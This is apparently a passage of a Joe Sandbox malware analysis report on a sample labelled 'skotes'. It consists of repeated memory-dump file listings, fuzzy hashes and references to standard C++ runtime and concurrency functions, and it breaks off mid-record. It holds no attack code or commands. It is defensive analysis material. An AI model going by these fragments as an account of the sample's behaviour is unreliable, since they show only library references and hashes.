                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1924466884-0
                                                                                                                                                                                                                                              • Opcode ID: bbfffb619bf89a3e446ad13031b14af1e43a2d97e2ce1413a6db9463c2803398
                                                                                                                                                                                                                                              • Instruction ID: fd2280c4a30e64f056be0aea2b3e6bd855afae247125b49633298d57781f2f5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbfffb619bf89a3e446ad13031b14af1e43a2d97e2ce1413a6db9463c2803398
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85411535A002089FCB00EF64C495BBDB7E5FF48350F1480AADE599B392DB30A945CBA1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00BE6ED1
                                                                                                                                                                                                                                              • std::_Rethrow_future_exception.LIBCPMT ref: 00BE6F22
                                                                                                                                                                                                                                              • std::_Rethrow_future_exception.LIBCPMT ref: 00BE6F32
                                                                                                                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00BE6FD5
                                                                                                                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00BE70DB
                                                                                                                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00BE7116
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1997747980-0
                                                                                                                                                                                                                                              • Opcode ID: fecf66c55a675402d24d3eaf518f3c84dcd0d25a2d8c0ce1137a6953758d571b
                                                                                                                                                                                                                                              • Instruction ID: 54110161e61e9615789dc801f07e7107e908e6b6857410d15129bc0a1d545252
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fecf66c55a675402d24d3eaf518f3c84dcd0d25a2d8c0ce1137a6953758d571b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1D2709043849FDF24DFA6C945BAFBBF4EF15310F0045ADE41697682EB35A909CBA2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BF4538
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BF456C
                                                                                                                                                                                                                                              • Hash.LIBCMT ref: 00BF45D5
                                                                                                                                                                                                                                              • Hash.LIBCMT ref: 00BF45E5
                                                                                                                                                                                                                                                • Part of subcall function 00BF9C41: std::bad_exception::bad_exception.LIBCMT ref: 00BF9C63
                                                                                                                                                                                                                                              • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00BF474B
                                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BF47A4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3010677857-0
                                                                                                                                                                                                                                              • Opcode ID: 3018eac3c1c55f5016fe9d1f6b4e8742d4fa8bce05509464274673577a7656a5
                                                                                                                                                                                                                                              • Instruction ID: 1a8a4e6f7970cffb179db122a40846321ac665cd406816caf069e4f44163378a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3018eac3c1c55f5016fe9d1f6b4e8742d4fa8bce05509464274673577a7656a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F08172B0A11A56BAD718EF758445BEAFBE8BF09700F10025AF52897281DBB4A524CBD1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00BEECED
                                                                                                                                                                                                                                              • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00BEED17
                                                                                                                                                                                                                                                • Part of subcall function 00BEF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00BEF3FA
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00BEED53
                                                                                                                                                                                                                                              • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00BEED94
                                                                                                                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00BEEDC6
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00BEEDEC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1319684358-0
                                                                                                                                                                                                                                              • Opcode ID: d9bb44c32140f3f79d2b24d5d3019494d0feef5c8bc7af3113320fddeac7fc66
                                                                                                                                                                                                                                              • Instruction ID: 8ebc27aac1b92226aea24fecfbdc2420eb0fcfd464e30f211ca07220f2c18a4a
